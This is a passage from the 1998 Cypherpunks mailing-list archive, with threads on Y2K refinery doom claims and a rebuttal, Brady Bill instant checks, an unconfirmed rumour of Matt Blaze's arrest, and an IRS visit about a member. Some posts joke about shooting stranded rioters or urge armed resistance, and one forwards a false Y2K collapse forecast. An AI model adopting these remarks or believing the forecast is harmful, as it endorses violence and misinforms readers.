> in the cities.  (This isn't New Zealand, baby, this is LA)

You are missing my point.

Yes, it is possible that if power goes out, looting might occur.

I am now considering another possibility: what happens if the power DOES
NOT go out? What would the gunnuts do? Or, if the power does go out but
looting does not start, would the gunnuts shoot some blacks that they
mistake for "looters" but who are just walking down the streets?

> When the rioters get bored, they'll get into cars.
> When they run out of gas, they'll stay where they are stranded
> as the gas pumps don't work.  Some fine huntin' then, bubba.
> 
>    Mr. Moisin-Nagant

That's Mosin-Nagant.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 2 Dec 1998 05:01:32 +0800
To: cypherpunks@cyberpass.net
Subject: y2k+oil refineries
Message-ID: <199812012012.MAA03042@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



a disturbing post on the idea that maybe embedded systems
in refineries are so "embedded" they can't even be reached/
isolated. also hugely ubiquitous....

------- Forwarded Message


> 
> Gary North's Y2K Links and Forums
> 
>  1998-11-30 13:28:22
> Subject:
>  Fuel Production Plants
> Comment:
>  Let's hope this informant is wrong. If you have counter-evidence, contact me
> at P. O. Box 8000, Tyler, TX 75711.
> 
> * * * * * * * *
> 
> I have one very, very reliable source within that industry who tells me that
> the oil refining industry can't cope with the task. I am told that the problem
> of embedded systems can NOT be fixed EVER, no matter how much time were
> allowed. WHY? Because the refineries themselves would have to be dismantled to
> uncover these embedded systems. Essentially, the refineries would have to be
> destroyed and rebuilt!!! These embedded systems are buried within enclosed
> systems. Identifying, testing and replacing these systems is too impractical.
> It is financially unsound to do so. The better option is to build new ones.
> There is no time to do this with less than 400 days left and the time to build
> a new refinery is 3 to 5 years.
> 
> So, what does this mean? My sources, especially the most reliable source tell
> me that it means that on January 1, 2000... the oil and gas refineries will
> cease operations. These facilities also have converted their inventory
> management control systems to small inventory levels so that inventory levels
> are running about 1 to 2 days capacity. A few years ago, the industry averaged
> a 1 to 6 month supply in storage tanks. Not so today.
> 
> The results: By 1/5/2000 there will be no gasoline, no diesel fuel, no natural
> gas, no heating oil, no fuel oil products at all. This means trains will have
> no fuel. Trucks will have no fuel. Cars will have no fuel. Electric Power
> Plants will have no oil for fuel, nor coal... because there will be no fuel to
> power the vehicles to get it to them. So, there will be no electricity. And
> you know the remaining domino schematic from that point.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 2 Dec 1998 06:06:40 +0800
To: cypherpunks@cyberpass.net
Subject: Re: New Brady Bill Implications
In-Reply-To: <v04003a00b289da243335@[24.1.50.17]>
Message-ID: <v0313031fb28a08abc179@[209.66.100.75]>
MIME-Version: 1.0
Content-Type: text/plain



At 11:40 AM -0800 12/1/98, Declan McCullagh wrote:
>It does not affect sale of firearms by non-dealers (non-FFL holders). Look
>for the Clinton administration to try to change this; at a press conference
>today the DC reporter rat-pack was moaning about unregulated gun shows.
>
>It does affect non-sale transfers by FFLs. Per the DoJ rule: "NICS checks
>apply to transfers and are not limited to firearm sales."
>
>I have an article up at www.wired.com shortly about the privacy implications.
>
>-Declan

I'm staying out of this latest round of Brady Bill stuff...as this is very,
very old news. Anyone just now realizing that an "Instant Check" system is
being deployed has been asleep under a rock for the last few years.

And I'm staying away from Igor Chudov's rants about "gunnuts" [sic].

As for the privacy implications of the instant check system, I abandoned
the NRA a few years ago when it began pushing this instant check system
(and also when some of its leaders were lukewarm in their support of gun
rights). It was obvious that it would lead to a fully computerized gun
registration system, as indeed it has...duh! The NRA claimed it would not,
but now they are busy getting ready to sue the FBI and other law enforcment
agencies to force them not to retain the information they get from the
instant check system. Duh, again. (This was all foreseeable to anyone with
half a brain.)

The country now has the beginnings of a national gun registration system,
courtesy of such "useful idiots" as the National Rifle Association.

As for who buys guns and the core of the whole debate, there's a simple,
logical, compelling, and constitutional solution:

Either someone is in prison or jail or otherwise under incarceration, or he
is not. If he is in prison, his guns and lots of other things are not
available to him.

Once he is out of prison, and is no longer under incarceration, all of his
constitutional rights are restored to him. The First Amendment rights of
free speech and free practice of religion, the Third Amendment right not to
have troops quartered in his home. The Fourth Amendment right about lawful
searches. The Fifth Amendment right about compelled testimony. The Sixth
Amendment right about jury trials. And so on.

Oh, and of course the Second Amendment.

There is no constitutional support that I can find that says the government
can, for example, require ex-felons to get permission slips to speak out,
that can require them to renounce certain religions, etc.

And no support, constitutionally, for denying them Second Amendment rights.

Sure, there may be _pragmatic_ reasons...we don't want these evil felons
like Bill Clinton having guns, speaking freely, going to Baptist Bible
camps, etc.

But wanting something and getting it, constitutionally, are entirely
different things.

Seen this way, there is no need for any kind of instant check. Nor does the
Constitution support the notion that the Second, or First, or Third, etc.,
rights depend on applying for a permit, getting a license, producing a
valid ID and Social Security Number, or any of the modern baggage attached
to such things.

Gun sales should be as they once were: you plunk your money down and walk
out with a gun. You don't need no steenking badges, licenses, permission
slips, approvals from your psychiatrist, training classes, or evidence of
some special need.

Felons should either be in prison or restored to their full rights after
doing their time.

--Tim May

"I swear to tell the truth, the whole truth, just the way the President did."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 2 Dec 1998 04:23:44 +0800
To: Steve Schear <cypherpunks@cyberpass.net
Subject: Re: New Brady Bill Implications
In-Reply-To: <3.0.2.32.19981201022809.00743bf4@pop.primenet.com>
Message-ID: <199812011936.LAA23593@smtp.well.com>
MIME-Version: 1.0
Content-Type: text/plain



It does not affect sale of firearms by non-dealers (non-FFL holders). Look
for the Clinton administration to try to change this; at a press conference
today the DC reporter rat-pack was moaning about unregulated gun shows.

It does affect non-sale transfers by FFLs. Per the DoJ rule: "NICS checks
apply to transfers and are not limited to firearm sales."

I have an article up at www.wired.com shortly about the privacy implications.

-Declan




At 09:40 AM 12-1-98 -0800, Steve Schear wrote:
>>-----BEGIN PGP SIGNED MESSAGE-----
>>Hash: SHA1
>>
>>I'm watching Headline News, and they are reporting
>>that "now", under new provisions in the Brady Bill,
>>and 'instant' background check is being made. This
>>even is for simple rifles and shotguns.
>
>How does this affect private, that is non-dealer, gun sales (like at swap
>meets)?
>
>--Steve
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 2 Dec 1998 00:38:49 +0800
To: cypherpunks@cyberpass.net
Subject: NZ or LA in Y2K
Message-ID: <199812011551.QAA03245@replay.com>
MIME-Version: 1.0
Content-Type: text/plain




At 07:54 PM 11/30/98 -3000, Igor Chudov @ home wrote:
>
>But objectively, there is a large category of people who are bored
>with their current lifestyle and gleefully expect a "total breakdown"
>of the society so that they could shoot live man sized targets instead
>of boring paper targets.
>
>They are likely to be disappointed by Y2K, or so I expect. (again,
>my expectation that social breakdown is not likely to happen does
>not preclude me from reasonable preparations)

When the power goes out, the rioting and looting starts
in the cities.  (This isn't New Zealand, baby, this is LA)

When the rioters get bored, they'll get into cars.
When they run out of gas, they'll stay where they are stranded
as the gas pumps don't work.  Some fine huntin' then, bubba.

   Mr. Moisin-Nagant












  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 2 Dec 1998 09:24:29 +0800
To: cypherpunks@cyberpass.net
Subject: Re: New Brady Bill Implications
In-Reply-To: <v04003a00b289da243335@[24.1.50.17]>
Message-ID: <v03130322b28a4022a41b@[209.66.100.75]>
MIME-Version: 1.0
Content-Type: text/plain



At 3:04 PM -0800 12/1/98, Frederick Burroughs wrote:
>Tim May wrote:
>
>>  As for the privacy implications of the instant check system, I abandoned
>> the NRA a few years ago when it began pushing this instant check system
>> (and also when some of its leaders were lukewarm in their support of gun
>> rights). It was obvious that it would lead to a fully computerized gun
>> registration system, as indeed it has...duh! The NRA claimed it would not,
>> but now they are busy getting ready to sue the FBI and other law enforcment
>> agencies to force them not to retain the information they get from the
>> instant check system. Duh, again. (This was all foreseeable to anyone with
>> half a brain.)
>
>The NRA is claiming that the database of citizens who purchase guns legally is
>prohibited by the Brady Bill. FBI claims it will be used for statistical
>purposes
>only. What will the statistics be used for? In the near future, we might
>expect
>anyone with more than 0.5 brain (among other handicaps) to fail the
>instant check.
>Ahh, now I see why they call it the Brady Bill (sincere apologies to Mr.
>Brady).


Yes, statistical purposes only. Like the way the Census data are used for
statistical purposes only...except when used to round up those with
Japanese-sounding names.

(Pity in 1940 they weren't demanding that "race" be specified, as they now
do. Would've made finding all the Matsuis and Toyotas a bit easier.)

Here in California we have had computerized checks for many years, and now
the Dealer's Record of Sale (DROS) is almost always transmitted
electronically to the state capital. (One dealer said California will soon
"phase out" paper-based forms, and even small dealers will have to get
computerized.)

The effect is that a data base of gun owners is growing. "Guns: Negative"
and "Guns: Positive" are heard over police scanners (an illegal act, to
listen) as units roll up to residences. They check with the central data
base. Eric Blair is spinning.

--Tim May


"I swear to tell the truth, the whole truth, just the way the President did."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Frank O'Dwyer" <fod@brd.ie>
Date: Wed, 2 Dec 1998 04:17:40 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Securing data in memory (was "Locking physical memory (fwd)
In-Reply-To: <19981130180002.17576.qmail@nym.alias.net>
Message-ID: <36642CC3.6D70A65B@brd.ie>
MIME-Version: 1.0
Content-Type: text/plain



lcs Mixmaster Remailer wrote:
> Most PCs today are not well balanced architecturally.  They should
> really have a couple hundred megabytes of memory.  Memory is cheap
> enough today that this can be added, but the motherboard configuration
> may limit the amount.  If you had this much memory, swapping to disk
> would be a smaller problem.

Unless you're running NT. I have a box with NT server and 256MB RAM, and
I'm pretty sure about 100MB of that has never seen any data. The disk
still rattles away, even though the machine is typically left switched
on. For example, if you run Word, log out, then run Word again, it still
seems to go for the disk. 

Cheers,
Frank O'Dwyer.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frederick Burroughs <riburr@shentel.net>
Date: Wed, 2 Dec 1998 07:43:03 +0800
To: Cypherpunks <cypherpunks@ns.minder.net>
Subject: Re: New Brady Bill Implications
In-Reply-To: <v04003a00b289da243335@[24.1.50.17]>
Message-ID: <366475F0.DD6CAA9F@shentel.net>
MIME-Version: 1.0
Content-Type: text/plain





Tim May wrote:

>  As for the privacy implications of the instant check system, I abandoned
> the NRA a few years ago when it began pushing this instant check system
> (and also when some of its leaders were lukewarm in their support of gun
> rights). It was obvious that it would lead to a fully computerized gun
> registration system, as indeed it has...duh! The NRA claimed it would not,
> but now they are busy getting ready to sue the FBI and other law enforcment
> agencies to force them not to retain the information they get from the
> instant check system. Duh, again. (This was all foreseeable to anyone with
> half a brain.)

The NRA is claiming that the database of citizens who purchase guns legally is
prohibited by the Brady Bill. FBI claims it will be used for statistical purposes
only. What will the statistics be used for? In the near future, we might expect
anyone with more than 0.5 brain (among other handicaps) to fail the instant check.
Ahh, now I see why they call it the Brady Bill (sincere apologies to Mr. Brady).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 2 Dec 1998 08:48:52 +0800
To: Tim May <cypherpunks@cyberpass.net
Subject: Re: New Brady Bill Implications
In-Reply-To: <199812011936.LAA23593@smtp.well.com>
Message-ID: <199812020013.QAA20073@smtp.well.com>
MIME-Version: 1.0
Content-Type: text/plain



At 01:14 PM 12-1-98 -0800, Tim May wrote:
>As for the privacy implications of the instant check system, I abandoned
>the NRA a few years ago when it began pushing this instant check system
>(and also when some of its leaders were lukewarm in their support of gun
>rights). It was obvious that it would lead to a fully computerized gun
>registration system, as indeed it has...duh! The NRA claimed it would not,
>but now they are busy getting ready to sue the FBI and other law enforcment
>agencies to force them not to retain the information they get from the
>instant check system. Duh, again. (This was all foreseeable to anyone with
>half a brain.)
>
>The country now has the beginnings of a national gun registration system,
>courtesy of such "useful idiots" as the National Rifle Association.


I was chatting for a while this afternoon with Larry Pratt of GOA
(http://www.gunowners.org/). He pointed out that the NRA's compromising
stance is not new. They've supported many, many pieces of gun control
legislation since around the 1930s. Today at their press conference, a
phlanx of NRA reps stressed that they really want this instant check.
Necessary for law enforcement, whatever.

The NRA is the CDT of the gun world.

Remember when CDT's staff (before they left EFF) cut a deal on the Digital
Telephony/CALEA bill and endorsed it? Now, years later when some of the
provisions kick in, they're upset that the Justice Department wants more
power than the law allows.

Same thing's happening here with the NRA. What a surprise.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 2 Dec 1998 09:17:18 +0800
To: Frederick Burroughs <cypherpunks@ns.minder.net>
Subject: Re: New Brady Bill Implications
In-Reply-To: <v04003a00b289da243335@[24.1.50.17]>
Message-ID: <199812020050.QAA29991@smtp.well.com>
MIME-Version: 1.0
Content-Type: text/plain



Well,actually the FBI is claiming it will be used for audits, including
appeals from denials, not just statistical purposes.

Also interesting in this is the lack of outrage from self-proclaimed
"privacy advocates" -- really leftists who think it's OK to restrict guns.
Though some are better than others.

-Declan



At 06:04 PM 12-1-98 -0500, Frederick Burroughs wrote:
>
>
>Tim May wrote:
>
>>  As for the privacy implications of the instant check system, I abandoned
>> the NRA a few years ago when it began pushing this instant check system
>> (and also when some of its leaders were lukewarm in their support of gun
>> rights). It was obvious that it would lead to a fully computerized gun
>> registration system, as indeed it has...duh! The NRA claimed it would not,
>> but now they are busy getting ready to sue the FBI and other law enforcment
>> agencies to force them not to retain the information they get from the
>> instant check system. Duh, again. (This was all foreseeable to anyone with
>> half a brain.)
>
>The NRA is claiming that the database of citizens who purchase guns
legally is
>prohibited by the Brady Bill. FBI claims it will be used for statistical
purposes
>only. What will the statistics be used for? In the near future, we might
expect
>anyone with more than 0.5 brain (among other handicaps) to fail the
instant check.
>Ahh, now I see why they call it the Brady Bill (sincere apologies to Mr.
Brady).
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 2 Dec 1998 12:36:30 +0800
To: cypherpunks@cyberpass.net
Subject: Fwd: FC: Gun groups take aim at new FBI database
Message-ID: <199812020304.TAA04962@smtp.well.com>
MIME-Version: 1.0
Content-Type: text/plain




>Date: Tue, 01 Dec 1998 21:50:05 -0500
>To: politech@vorlon.mit.edu
>From: Declan McCullagh <declan@well.com>
>Subject: FC: Gun groups take aim at new FBI database
>Sender: owner-politech@vorlon.mit.edu
>X-URL: Politech is at http://www.well.com/~declan/politech/
>
>
>
>http://www.wired.com/news/news/politics/story/16561.html
>
>                     Gun Groups Take Aim at Database
>                     by Declan McCullagh (declan@wired.com)
>
>                     4:45 p.m.  1.Dec.98.PST
>                     WASHINGTON -- A controversial FBI
>                     database that records gun buyers'
>                     names, addresses, and Social Security
>                     numbers is "a national surveillance
>                     system" that violates the law. 
>
>                     So says the National Rifle Association in a
>                     motion for a preliminary injunction filed
>                     Monday in US District Court. 
>
>                     [...]
>
>
>
>--------------------------------------------------------------------------
>POLITECH -- the moderated mailing list of politics and technology
>To subscribe: send a message to majordomo@vorlon.mit.edu with this text:
>subscribe politech
>More information is at http://www.well.com/~declan/politech/
>--------------------------------------------------------------------------
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 2 Dec 1998 15:28:32 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Matt Blaze arrested???
In-Reply-To: <19981202051225.1348.qmail@hotmail.com>
Message-ID: <v03130323b28a955c8228@[209.66.100.75]>
MIME-Version: 1.0
Content-Type: text/plain



At 10:19 PM -0800 12/1/98, Eric Cordian wrote:
>A Disposable Hotmail Account writes:
>
>> According to the report a Bell Labs mathematician named
>> Blaze was arrested at the O'Hare airport today, in some
>> kind of FBI sting operation.
>
>Who are you?
>
>While the originating IP of this message is owned by Bell Labs,
>I find it surprising that a story of this magnitude is nowhere to
>be found on the various wire services.
>
>Can anyone confirm or deny this report?  Color me suspicious.
>

I'm more than suspicious....the thing is written in a spoof motif.

On the other hand, remember how several of us were apparently "warned" (in
the threatening sense) by the Internal Revenue Service by weird forwardings
of our messages and by pre-announcement of Jim Bell's arrest?

Maybe someone from the State Department is pulling the same trick.

If so, Matt still has enough time to lock and load.....

--Tim May

"I swear to tell the truth, the whole truth, just the way the President did."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "jim finder" <jim_finder@hotmail.com>
Date: Wed, 2 Dec 1998 13:43:00 +0800
To: cypherpunks@cyberpass.net
Subject: Matt Blaze arrested???
Message-ID: <19981202051225.1348.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain



I heard a shocking thing on the radio a few minutes ago.
I'm <*really*> sorry I didn't hear the whole report but I'm
hoping someone here can shed some light,

According to the report a Bell Labs mathematician named
Blaze was arrested at the O'Hare airport today, in some
kind of FBI sting operation.  I didn't hear the whole segment,
but it sounded like it had something to do with passing classified
(crypto?) information to a foreign government.  The part of
the report that I heard didn't say what kind of info or what
he was charged with, but I got the impression that it was either
some kind of ITAR thing or maybe espionage.  They did
say it was part of a long term sting operation and mentioned
something (that I didn't hear clearly) about "other arrests"
that either already happened or were likely to happen soon.

Was this Matt Blaze?  It sure sounds like it must be.  Is
there a crackdown going on? Has anyone else been busted?

Does anyone have more complete information about this?

Jim


______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 2 Dec 1998 07:39:08 +0800
To: cypherpunks@cyberpass.net
Subject: Re: y2k+oil refineries
Message-ID: <199812012241.XAA19806@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



North's "scrap the refinery, the chip broke" scenario was forwarded to
comp.software.year-2000 by Paul Milne, resident doomsayer, foul-mouthed
religious fanatic, economic Marxist, and all around kook.  It prompted a
very knowledgable reply which pointed out how silly the whole idea was,
from someone with relevant experience.  Maybe next time Detweiler could
check c.s.y2k to filter out North's nuttier ideas before forwarding
them here.


Author: SAG
Email: stephen.and.marilyn.goldstein@worldnet.att.net
Date: 1998/12/01

fedinfo@halifax.com wrote:
> 
> From GN:
> 
> Category:
>  Noncompliant_Chips
> Date:
>  1998-11-30 13:28:22
> Subject:
>  Fuel Production Plants
> 
> * * * * * * * *
> 
> I have one very, very reliable source within that industry who tells me that
> the oil refining industry can't cope with the task. I am told that the problem
> of embedded systems can NOT be fixed EVER, no matter how much time were
> allowed. WHY? Because the refineries themselves would have to be dismantled to
> uncover these embedded systems. Essentially, the refineries would have to be
> destroyed and rebuilt!!! These embedded systems are buried within enclosed
> systems. Identifying, testing and replacing these systems is too impractical.
> It is financially unsound to do so. The better option is to build new ones.
> There is no time to do this with less than 400 days left and the time to build
> a new refinery is 3 to 5 years.
> 
> So, what does this mean? My sources, especially the most reliable source tell
> me that it means that on January 1, 2000... the oil and gas refineries will
> cease operations. These facilities also have converted their inventory
> management control systems to small inventory levels so that inventory levels
> are running about 1 to 2 days capacity. A few years ago, the industry averaged
> a 1 to 6 month supply in storage tanks. Not so today.
> 
> The results: By 1/5/2000 there will be no gasoline, no diesel fuel, no
> natural gas, no heating oil, no fuel oil products at all. This means trains
> will have no fuel. Trucks will have no fuel. Cars will have no fuel. Electric
> Power Plants will have no oil for fuel, nor coal... because there will be no
> fuel to power the vehicles to get it to them. So, there will be no
> electricity. And you know the remaining domino schematic from that point.
> 
> ======
> 
> I have no way of knowing whether the embedded systems are just that, embedded
> in such a way that they can not be accessed. I imagine that some could be
> under fifty feet of concrete or otherwise inaccessable. If this is so, then
> there is not the slightest doubt at all, that it is indeed all over. Period.
> 
> I am not going to bandy about the issue of whether this source is reliable or
> not. It makes no difference. The only thing I am concerned with is whether
> these systems are in fact inaccessable. I know that not every system is
> inaccessable. The question is whether there are enough inaccessable systems to
> mean that the refineries etc. will not function.
> 
> Of course, I would love to hear someone counter this with evidence showing
> that what has been related above is not true, or it is an urban myth etc.
> But, I would like 'evidence'. Not conjecture or inuendo or suppositions.
> 
> If it were so, that there were indeed these inaccessable systems, would the
> companies involved let it be known publically? I think not.
> 
> If this report is accurate, the remediation is 100% moot as I have said all
> along, and you can kiss your butt good-bye.

I'm not sure if I want to play this game Mr. Milne -- you offer this
article which is, conjecture, innuendo and supposition but demand that
any counter story be documented by "evidence."  That's pretty tough and,
frankly, I'm not up to the task as my knowledge is with electric power
plants -- not oil refineries.

They do, of course, share some important characteristics and so I'll
give it a try.  The approach will be from two perspectives -- first,
I'll explain some power plant construction practices that contradict the
refinery story; second, I'll offer another review of the nature of the
"embedded" systems that might be at issue.

Power Plant (and refinery) construction . . . .

Remember, power plants and refineries are:
o Capital intensive
o Make increased use of computerized process control systems
o Operate a continuous manufacturing/conversion process employing high
temperatures and pressures.

Typical design life of a coal-fired power plant is 40 years.  During
that period, any number of components *will* fail and *will have to be
replaced.*  Wouldn't make much sense to put a $500million investment at
risk 'cause a $20.00 part failed in some inaccessible location.  Thus
EVERYTHING is accessible.

You want evidence and I'm not about to take you on a power plant tour
but even if you've never been inside a power plant the construction
practice is similar to that found in many other industrial settings and,
if you've ever been aboard a naval vessel or taken a cruise, ships. 
These settings are nothing like your home (or even an office) with all
the infrastructure components nicely hidden behind walls -- pipes are
exposed and clearly labeled -- power and control cables are laid in
exposed cable trays and risers.  Electronic components are often mounted
in racks with easy access from front and back -- probably not at all
like your computer or home theatre configuration.  All this is to PERMIT
MAINTENANCE, REPAIR and MODIFICATION.

So you need to understand that the problem isn't just maintenance, in
general, or for y2k.  Process plants need to be modified frequently --
market conditions demand a change in inputs or outputs.  Can't get
enough sweet crude?  Exxon doesn't close the refinery -- they modify it
to handle the new feedstock (I got the grand tour from a fellow I knew
who worked at Exxon's Baton Rouge refinery, years ago).

Want some pictures?  Here are a few from several "continuous process"
industries: http://www.powerprocesspiping.com/,
http://www.bdmechanical.com/ppiping.htm,
http://silverweb.nf.ca/m&m/cb-p&p.htm, and
http://www.shambaugh.com/process.htm.

Now consider the nature of these embedded components.  This has been the
subject of much discussion in csy2k.  I'd like to suggest that there are
three broad categories of components in this context:

o The control system(s) -- SCADA -- one or more intelligent nodes build
on traditional minicomputer, or more recently, microprocessor-based
server technology.  These are very accessible -- they're in, adjacent
to, or very near, the control room.  In an even more modern "distributed
control system," some of the capability will be located in different
areas of the plant.  Nevertheless, they still have to be very accessible
-- stuff breaks -- memories get hard, multibit errors, disk drives fail,
etc.

o Remote devices -- the control systems can't run without data and so
you have dozens to thousands of remotes -- devices that measure process
parameters (temperature, pressure, mass flow, volumetric flow,
acceleration and mechanical position (valve position or tank levels))
and a smaller number of remotes that can act on SCADA commands (start a
motor, open a valve, etc.)  Though most of these devices are pretty
dumb, some may have a bit of silicon-based intelligence and therefore
susceptible to y2k problems.  BUT, they all have to be accessible
because 1) they malfunction or need to be recalibrated and 2) plant
modifications often require removal/replacement to accommodate process
changes.

o Embedded systems -- I think that the consensus is that the real
embedded systems are those systems that are not obviously run by a
computer -- the power plants water chemistry analyzer or the refineries
gas chromatograph.  These are on the site but they're not in the "plant"
-- they're in the lab -- very accessible.

Now "accessible" doesn't always mean you can walk right up and touch
it!  Guess where the flue gas monitoring remotes (temperature, opacity)
are located -- top of the boiler or in the stack.  But here's the
scenario -- opacity indicator increases (flue gas has more smoke in it)
but the stack gas "looks" clear.  Do you shut down the plan on
environment limits or do you send a maintenance man to replace the
remote?

Now is it possible that conditions would be different at an oil
refinery.  Sure, like I wrote at the beginning, I'm not really familar
with these.  But, really, we'd be looking at some obtuse examples --
imagine that rather than using a tank level indicator to see how much
gasoline is in a tank, someone came up with the bright idea of putting a
strain gauge *under* the tank and determing the amount of product in the
tank but computing the weight on the gauge and using that to compute the
amount of product.  The device fails and, we'll all agree, it is not
practical to replace it.

Does the refinery stop using the tank?  I wouldn't think so.  They
retrofit a traditional tank level indicator (float) to provide the
needed information. 

HTH,

SAG




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Blanc" <blancw@cnw.com>
Date: Wed, 2 Dec 1998 16:20:56 +0800
To: <cypherpunks@cyberpass.net>
Subject: I Got Mine
Message-ID: <000301be1dc9$357bf260$808195cf@blanc>
MIME-Version: 1.0
Content-Type: text/plain



I received my visit from the friendly IRS guys tonight, asking about CJ/Toto.
It seems that they had a copy of two emails (which they took from his
confiscated computer) with my name on them - one of them the one in which I
chastized him for sending a threatening letter to Billg.   According to the
headers in the message which they showed to me, Toto forwarded my reply through
remailer@replay.com, Anon-To: billg.

They wanted to know about my associations with Toto (I still think of him by
that name), of course, of which I had none except through email.  In our
conversation, I discovered things that I didn't know about Toto's situation:
that he had sent threatening letters to the Mounties, and that he had threated
to kill the judge trying Jim's case.   This is why he will be held and tried in
the local jail - because the potential victims (besides the Mounties) are in
this area.  (sigh) I'm afraid CJ really went over the edge here and backed
himself up in a corner.  I should have chastized him more severely and counseled
him against rash acts of unkindness (not that I hold myself responsible for what
he did, but he did pay attention to me).

Kind of amusingly, one of them asked if CJ had ever asked me to join the Circle
of Eunuchs!  heh.   I explained that it was Toto's Art imitating Life, creating
stories about a revolutionary group based on the list discussions, and that I
suspected he called it the Circle of Eunuchs because of the accusations ( by
*some people* )that cpunks are ineffectual.

We had a bit of discussion on a number of things, including the subject of free
speech and how close one can get to it before being subject to arrest.  I asked
them what that crucial point was when this would happen, since there is no crime
until action is actually taken.  They said this would be when a direct threat is
made and a specific name is mentioned.  I referenced as an example the web site
which some group put up containing a list of the names of abortion-performing
doctors, mentioned in the press as a 'hit list'.   They said that a web site
with a list of names is not a problem.  It is when statements are made about
killing the individuals on the list that a person would have "crossed the line".
One of the investigators also brought up the issue of the conflict between free
speech vs life & liberty, of when one infringes on the other (as in threatening
to take away someone's life).  I remarked that one must always be prepared for
the unexpected, and they made some points about taking threats seriously and the
necessity of government agents looking out for their personal safety.

I asked if cypherpunks would actually be subpoenaed to appear at CJ's trial.
They said it depends on CJ:  if he accepts a deal, he would likely get a reduced
sentence, but if he takes them to trial then there could be quite a number of
Cpunks called forth.  I suggested if that happens we could all go out to dinner
: ) and they thought this would be quite interesting.  One of the investigators
expressed a great interest in the cpunk dicussions and concepts;  I described
something of what the list is about and the flow of subscribers through it, and
referred him to the archives, saying '94-'95 were some good years.  I'm sure
given a little time and several dinners we could convert him to the Dark Side.
<g>

   ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Wed, 2 Dec 1998 14:47:34 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Matt Blaze arrested???
In-Reply-To: <19981202051225.1348.qmail@hotmail.com>
Message-ID: <199812020619.AAA21655@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



A Disposable Hotmail Account writes:

> According to the report a Bell Labs mathematician named
> Blaze was arrested at the O'Hare airport today, in some
> kind of FBI sting operation.

Who are you?  

While the originating IP of this message is owned by Bell Labs, 
I find it surprising that a story of this magnitude is nowhere to
be found on the various wire services. 

Can anyone confirm or deny this report?  Color me suspicious.

-- 
Eric Michael Cordian 0+
O:.T:.O:. Mathematical Munitions Division
"Do What Thou Wilt Shall Be The Whole Of The Law"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 2 Dec 1998 13:53:12 +0800
To: Lucky Green <shamrock@cypherpunks.to>
Subject: Re: Fwd: FC: Gun groups take aim at new FBI database
In-Reply-To: <199812020304.TAA04962@smtp.well.com>
Message-ID: <199812020524.VAA10327@smtp.well.com>
MIME-Version: 1.0
Content-Type: text/plain



I've been chatting with Marc after he read the article; he confirmed his
stance and elaborated on it. I'll see if I can get his permission to
forward the message.

ACLU ("what second amendment?") takes the same position,I believe. 

-Declan




At 06:11 AM 12-2-98 +0100, Lucky Green wrote:
>On Tue, 1 Dec 1998, Declan McCullagh wrote:
>
>
>> >http://www.wired.com/news/news/politics/story/16561.html
>> >
>> >                     Gun Groups Take Aim at Database
>
>"EPIC director Marc Rotenberg likened the plan to driver licensing, adding
>that privacy safeguards should be in place."
>
>Well, at least this makes it clear where EPIC stands on civil liberties.
>License to exercise your rights under the 2nd, license to exercise your
>rights under the 1st...
>
>-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@cypherpunks.to>
Date: Wed, 2 Dec 1998 13:35:39 +0800
To: Declan McCullagh <declan@well.com>
Subject: Re: New Brady Bill Implications
In-Reply-To: <199812020013.QAA20073@smtp.well.com>
Message-ID: <Pine.BSF.3.96.981202055601.24783D-100000@pakastelohi.cypherpunks.to>
MIME-Version: 1.0
Content-Type: text/plain



GOA is good. So is JPFO (Jews for the Preservation of Firearms Ownership).
